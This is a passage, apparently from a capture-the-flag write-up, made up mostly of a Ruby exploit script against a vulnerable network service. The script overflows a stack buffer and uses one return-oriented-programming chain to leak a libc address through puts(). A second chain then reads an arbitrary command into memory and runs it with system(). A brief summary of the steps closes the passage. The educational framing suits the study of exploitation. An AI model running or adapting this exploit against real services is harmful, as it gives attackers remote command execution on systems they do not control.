welcome_str = read_until(s, 'enter!')

# Extract the number so we don't have to patch our binary anymore
welcome_str =~ /Enter ([0-9]+) char/

# Send the values it wants
s.write(('A' * $1.to_i) + "\n")

# Read the next prompt
read_until(s, 'name?')

# Build the same stack from the write-up
EXPLOIT = [
  POP_RDI_RET, # Initial return address
    PUTS_PLT_ENTRY, # rdi = addr of puts() to print
  PUTS, # NEXT return address - actual puts()
  MAIN, # End at MAIN
].pack('Q*') # pack('Q*'), in Ruby, means encode as 64-bit little endian integers

# Send our overflow + exploit + newline
s.write(("A" * 56) + EXPLOIT + "\n")

# The last thing that prints before our payload is the address of POP_EDI_RET,
# so read to that
read_until(s, "\x81\x12\x40")

# Then read to the newline right after the leak
out = read_until(s, "\x0a")

# Remove the newline
out.gsub!(/\x0a$/, '')

# Now we have our libc base address!
LIBC_BASE_ADDRESS = (out + "\x00\x00").unpack('Q').pop
puts
puts "LIBC base (ie, addr of puts): 0x%x" % LIBC_BASE_ADDRESS
puts

# Now we kinda start over! Except now we can use addresses from libc.so,
# relative to the address we determined

# Address of system()
SYSTEM = LIBC_BASE_ADDRESS - 0x2edf0

# Address of sleep() - for testing
SLEEP = LIBC_BASE_ADDRESS + 0x7e1d0

# Address of pop rsi / pop <something I don't care> / ret
# (Recall we need rsi for second arg)
POP_RSI_POP_R15_POP_RBP_RET = LIBC_BASE_ADDRESS + 0x1919a7

# Address of pop rdx / pop <something I don't care> / ret
# (Recall we need rdx for third arg)
POP_RDX_RET = 0x401283

# Address of read() function, for populating memory
READ = LIBC_BASE_ADDRESS + 0x89d60

# Some random memory in the .data section that we can use for temp storage
WRITABLE_MEMORY = LIBC_BASE_ADDRESS + 0x163f60

# Read the initial banner (again)
welcome_str = read_until(s, 'enter!')

# Extract the number so we don't have to patch our binary anymore
welcome_str =~ /Enter ([0-9]+) char/

# Send the values it wants
s.write(('A' * $1.to_i) + "\n")

# Read the next prompt
read_until(s, 'name?')

# Call sleep() to make sure it's working
# EXPLOIT2 = [
#   POP_RDI_RET,
#   5,
#   SLEEP,
#   DEBUG
# ].pack('Q*')

EXPLOIT2 = [
  # Set up a read() syscall to read arbitrary data into memory

  # First argument = fd = 0 (read from stdin)
  POP_RDI_RET,
  0,

  # Second arg = buffer = anywhere we can write
  POP_RSI_POP_R15_POP_RBP_RET,
  WRITABLE_MEMORY,
  0x1337, # Doesn't matter (goes into r15)
  0x1337, # Doesn't matter (goes into rbp)

  # Third arg = size
  POP_RDX_RET,
  ARGV[0].length + 1,

  # Return into READ - this will put our command into memory!
  READ,

  # Set up system() call to run the command
  POP_RDI_RET,
  WRITABLE_MEMORY,

  # Return straight into SYSTEM
  SYSTEM,
].pack('Q*')

s.write(("A" * 56) + EXPLOIT2 + "\n")

# Not sure if the sleep is necessary but it helps me feel better!
sleep 1
s.write("#{ARGV[0]}\0\n")
sleep 1

# Then just read everything
loop do
  a = s.read(1)
  if a.nil? || a == ''
    exit
  end
  print a
end

In essence, that:

ROPs into puts to get the libc address of puts
Reads that
ROPs a second time into read() to get the command from stdin, then into system() to run the command
Sends the command (which will be read)
Reads everything else the socket sends

Good luck, and hope that makes sense!